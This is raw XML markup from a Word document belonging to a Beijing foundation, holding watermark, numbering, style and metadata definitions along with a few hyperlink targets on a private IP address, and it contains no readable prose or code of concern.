          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="北京保研公益基金会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3B" w:rsidRDefault="002750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7091" o:spid="_x0000_s1033" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:526.9pt;height:58.5pt;rotation:315;z-index:-251639808;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#ddd" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="北京保研公益基金会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3B" w:rsidRDefault="002750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7089" o:spid="_x0000_s1031" type="#_x0000_t136" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:526.9pt;height:58.5pt;rotation:315;z-index:-251643904;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:center;mso-position-vertical-relative:margin" o:allowincell="f" fillcolor="#ddd" stroked="f">
          <v:fill opacity=".5"/>
          <v:textpath style="font-family:&quot;宋体&quot;;font-size:1pt" string="北京保研公益基金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4D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B330E312"/>
    <w:lvl w:ilvl="0" w:tplc="487AFBA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B6F2633"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47A2648E"/>
    <w:lvl w:ilvl="0" w:tplc="B3DA43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CDD0663"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="456EFE52"/>
    <w:lvl w:ilvl="0" w:tplc="3776FF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26CE619D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="356E2E82"/>
    <w:lvl w:ilvl="0" w:tplc="A6326976">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="98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297530C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C344A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9730A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BC8804C"/>
    <w:lvl w:ilvl="0" w:tplc="4B9607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386F28A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EC45CD8"/>
    <w:lvl w:ilvl="0" w:tplc="1924E1A8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8AB337F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD2287B8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>
    <w:nsid w:val="45DD7DDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DA36DB52"/>
    <w:lvl w:ilvl="0" w:tplc="518850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494B7616"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18FE401A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>
    <w:nsid w:val="4B51141F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4920C566"/>
    <w:lvl w:ilvl="0" w:tplc="A6326976">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="98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51B975DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BEFE962C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>
    <w:nsid w:val="52292DCE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE4CAF46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>
    <w:nsid w:val="534B3415"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66B0D3F8"/>
    <w:lvl w:ilvl="0" w:tplc="A4A83F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4">
    <w:nsid w:val="537D2FF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="603EA340"/>
    <w:lvl w:ilvl="0" w:tplc="B62E90B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5">
    <w:nsid w:val="5A926D05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B983B38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6">
    <w:nsid w:val="5B61622D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B44CBCC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7">
    <w:nsid w:val="5BA5113F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C338D180"/>
    <w:lvl w:ilvl="0" w:tplc="A6326976">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="98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8">
    <w:nsid w:val="6C23541C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D548BE0C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9">
    <w:nsid w:val="708B447B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1601FDA"/>
    <w:lvl w:ilvl="0" w:tplc="A6326976">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="96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0">
    <w:nsid w:val="79E34040"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7E02AD4"/>
    <w:lvl w:ilvl="0" w:tplc="73CA97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1">
    <w:nsid w:val="7C337A70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D218703E"/>
    <w:lvl w:ilvl="0" w:tplc="662C2A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415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27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EDB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84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A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657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C965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4CB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80E07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA4208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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18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"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="15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17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426"/>
    <w:rsid w:val="00013C3B"/>
    <w:rsid w:val="00023842"/>
    <w:rsid w:val="000307B5"/>
    <w:rsid w:val="00031565"/>
    <w:rsid w:val="00041B0F"/>
    <w:rsid w:val="00061DF9"/>
    <w:rsid w:val="00070013"/>
    <w:rsid w:val="00080E81"/>
    <w:rsid w:val="00095F48"/>
    <w:rsid w:val="00096FD8"/>
    <w:rsid w:val="00097BBD"/>
    <w:rsid w:val="000B0E7E"/>
    <w:rsid w:val="000C776C"/>
    <w:rsid w:val="000E2DDB"/>
    <w:rsid w:val="00100AF4"/>
    <w:rsid w:val="001033E3"/>
    <w:rsid w:val="00114C0D"/>
    <w:rsid w:val="001356EE"/>
    <w:rsid w:val="00142A31"/>
    <w:rsid w:val="00143D02"/>
    <w:rsid w:val="001464A6"/>
    <w:rsid w:val="00152D01"/>
    <w:rsid w:val="00157558"/>
    <w:rsid w:val="001726FF"/>
    <w:rsid w:val="0018213B"/>
    <w:rsid w:val="001900F0"/>
    <w:rsid w:val="001A4DF1"/>
    <w:rsid w:val="001A5E5E"/>
    <w:rsid w:val="001A6909"/>
    <w:rsid w:val="001C76C8"/>
    <w:rsid w:val="001F4D1F"/>
    <w:rsid w:val="001F5B52"/>
    <w:rsid w:val="001F7C34"/>
    <w:rsid w:val="00201C86"/>
    <w:rsid w:val="00202436"/>
    <w:rsid w:val="00203F5A"/>
    <w:rsid w:val="00221827"/>
    <w:rsid w:val="00233530"/>
    <w:rsid w:val="00251F20"/>
    <w:rsid w:val="00275046"/>
    <w:rsid w:val="00287021"/>
    <w:rsid w:val="00293714"/>
    <w:rsid w:val="002A63F5"/>
    <w:rsid w:val="002A71A0"/>
    <w:rsid w:val="002B1E40"/>
    <w:rsid w:val="002B76B4"/>
    <w:rsid w:val="002C3D92"/>
    <w:rsid w:val="002E6887"/>
    <w:rsid w:val="00317965"/>
    <w:rsid w:val="00351D1C"/>
    <w:rsid w:val="00356794"/>
    <w:rsid w:val="00371693"/>
    <w:rsid w:val="00373244"/>
    <w:rsid w:val="003A65D0"/>
    <w:rsid w:val="003B1ADF"/>
    <w:rsid w:val="003B29B7"/>
    <w:rsid w:val="003D1ED8"/>
    <w:rsid w:val="003D4103"/>
    <w:rsid w:val="003E3A57"/>
    <w:rsid w:val="003E5BE6"/>
    <w:rsid w:val="003F6D9B"/>
    <w:rsid w:val="00413BBF"/>
    <w:rsid w:val="00414DE5"/>
    <w:rsid w:val="00430895"/>
    <w:rsid w:val="00474FCB"/>
    <w:rsid w:val="004762CB"/>
    <w:rsid w:val="00480C0C"/>
    <w:rsid w:val="00490DB2"/>
    <w:rsid w:val="004A68AA"/>
    <w:rsid w:val="004C24E0"/>
    <w:rsid w:val="004D3832"/>
    <w:rsid w:val="004D43B6"/>
    <w:rsid w:val="00546C6A"/>
    <w:rsid w:val="0057566D"/>
    <w:rsid w:val="00575DAF"/>
    <w:rsid w:val="00580BB5"/>
    <w:rsid w:val="005A0CD2"/>
    <w:rsid w:val="005A23C7"/>
    <w:rsid w:val="005A73E4"/>
    <w:rsid w:val="005B23AE"/>
    <w:rsid w:val="005C577F"/>
    <w:rsid w:val="005D6488"/>
    <w:rsid w:val="00617FC7"/>
    <w:rsid w:val="006325D5"/>
    <w:rsid w:val="00662809"/>
    <w:rsid w:val="0066307E"/>
    <w:rsid w:val="0068719D"/>
    <w:rsid w:val="0069559B"/>
    <w:rsid w:val="006B0427"/>
    <w:rsid w:val="006C0D48"/>
    <w:rsid w:val="006C7438"/>
    <w:rsid w:val="00701219"/>
    <w:rsid w:val="00704A20"/>
    <w:rsid w:val="00712122"/>
    <w:rsid w:val="0071487D"/>
    <w:rsid w:val="007265A2"/>
    <w:rsid w:val="0072691A"/>
    <w:rsid w:val="00740B7C"/>
    <w:rsid w:val="007703CB"/>
    <w:rsid w:val="007902C9"/>
    <w:rsid w:val="00792B2C"/>
    <w:rsid w:val="007B59B5"/>
    <w:rsid w:val="007B6FD8"/>
    <w:rsid w:val="007C60FE"/>
    <w:rsid w:val="007E171D"/>
    <w:rsid w:val="007E4DB5"/>
    <w:rsid w:val="007E78D8"/>
    <w:rsid w:val="007F1284"/>
    <w:rsid w:val="00831426"/>
    <w:rsid w:val="00841A9D"/>
    <w:rsid w:val="00846FB9"/>
    <w:rsid w:val="008544C1"/>
    <w:rsid w:val="0086125B"/>
    <w:rsid w:val="008D0772"/>
    <w:rsid w:val="008D1124"/>
    <w:rsid w:val="008D32B3"/>
    <w:rsid w:val="008E690F"/>
    <w:rsid w:val="00925B2F"/>
    <w:rsid w:val="00944B43"/>
    <w:rsid w:val="009703D5"/>
    <w:rsid w:val="00992481"/>
    <w:rsid w:val="009B7F55"/>
    <w:rsid w:val="009C2A90"/>
    <w:rsid w:val="009D3B47"/>
    <w:rsid w:val="009D6965"/>
    <w:rsid w:val="009F31D9"/>
    <w:rsid w:val="00A01A3C"/>
    <w:rsid w:val="00A3558F"/>
    <w:rsid w:val="00A45CF9"/>
    <w:rsid w:val="00A50D21"/>
    <w:rsid w:val="00A95430"/>
    <w:rsid w:val="00A96FAD"/>
    <w:rsid w:val="00AB1DB4"/>
    <w:rsid w:val="00AB524C"/>
    <w:rsid w:val="00AD30F5"/>
    <w:rsid w:val="00AF1CF3"/>
    <w:rsid w:val="00B040CE"/>
    <w:rsid w:val="00B1582B"/>
    <w:rsid w:val="00B2329B"/>
    <w:rsid w:val="00B46A7E"/>
    <w:rsid w:val="00B54208"/>
    <w:rsid w:val="00B60402"/>
    <w:rsid w:val="00B7147F"/>
    <w:rsid w:val="00BB4748"/>
    <w:rsid w:val="00C16075"/>
    <w:rsid w:val="00C20755"/>
    <w:rsid w:val="00C31626"/>
    <w:rsid w:val="00C5195B"/>
    <w:rsid w:val="00C555A4"/>
    <w:rsid w:val="00C556CC"/>
    <w:rsid w:val="00C72D46"/>
    <w:rsid w:val="00C9247A"/>
    <w:rsid w:val="00CB066F"/>
    <w:rsid w:val="00CB30F9"/>
    <w:rsid w:val="00CC18B6"/>
    <w:rsid w:val="00CE4EA0"/>
    <w:rsid w:val="00CF4925"/>
    <w:rsid w:val="00CF7025"/>
    <w:rsid w:val="00D05B92"/>
    <w:rsid w:val="00D14C0E"/>
    <w:rsid w:val="00D30D57"/>
    <w:rsid w:val="00D41DC7"/>
    <w:rsid w:val="00D61F86"/>
    <w:rsid w:val="00D75E42"/>
    <w:rsid w:val="00D94AAD"/>
    <w:rsid w:val="00D9513C"/>
    <w:rsid w:val="00DA2977"/>
    <w:rsid w:val="00DA59DD"/>
    <w:rsid w:val="00DA692C"/>
    <w:rsid w:val="00DE5965"/>
    <w:rsid w:val="00DF2325"/>
    <w:rsid w:val="00DF2E2C"/>
    <w:rsid w:val="00DF6D4E"/>
    <w:rsid w:val="00E0442F"/>
    <w:rsid w:val="00E34534"/>
    <w:rsid w:val="00E432B6"/>
    <w:rsid w:val="00E61C25"/>
    <w:rsid w:val="00E623C7"/>
    <w:rsid w:val="00E630DC"/>
    <w:rsid w:val="00E72426"/>
    <w:rsid w:val="00E833DB"/>
    <w:rsid w:val="00E925AC"/>
    <w:rsid w:val="00E96CDE"/>
    <w:rsid w:val="00E96E03"/>
    <w:rsid w:val="00EA1EED"/>
    <w:rsid w:val="00EE2184"/>
    <w:rsid w:val="00EE780B"/>
    <w:rsid w:val="00EF67EE"/>
    <w:rsid w:val="00F02A6C"/>
    <w:rsid w:val="00F03CAA"/>
    <w:rsid w:val="00F1315F"/>
    <w:rsid w:val="00F236D7"/>
    <w:rsid w:val="00F85417"/>
    <w:rsid w:val="00FB7304"/>
    <w:rsid w:val="00FD0129"/>
    <w:rsid w:val="00F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6D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14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3BB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954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8541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4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314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83142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31426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13BB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954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85417"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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1C76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B6040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F6D4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D64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F6D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F6D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2B76B4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
      </w:tabs>
      <w:ind w:left="420" w:hangingChars="150" w:hanging="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="30">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B76B4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
      </w:tabs>
      <w:ind w:leftChars="270" w:left="839" w:hangingChars="97" w:hanging="272"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B46A7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46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22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9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24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68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50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7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40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7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0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1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43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5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18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97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58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60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81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1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2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938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8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58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22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16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6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2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57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65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78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37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62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2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41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56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7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304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91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3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02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36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97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8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04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7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72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5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92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58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78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8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74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41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6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5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11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61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32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94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18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3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96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8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1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8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2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59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80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65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36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5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32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13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4244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8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1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92.168.203.144/storypage_04.php?id=115" TargetMode="External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192.168.203.144/back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192.168.203.144/test.php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192.168.203.144/back/upload/banner_58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9AAF-F4AD-41CC-A296-6E244F17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3</cp:revision>
  <cp:lastPrinted>2018-12-28T03:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-28T07:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-28T07:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>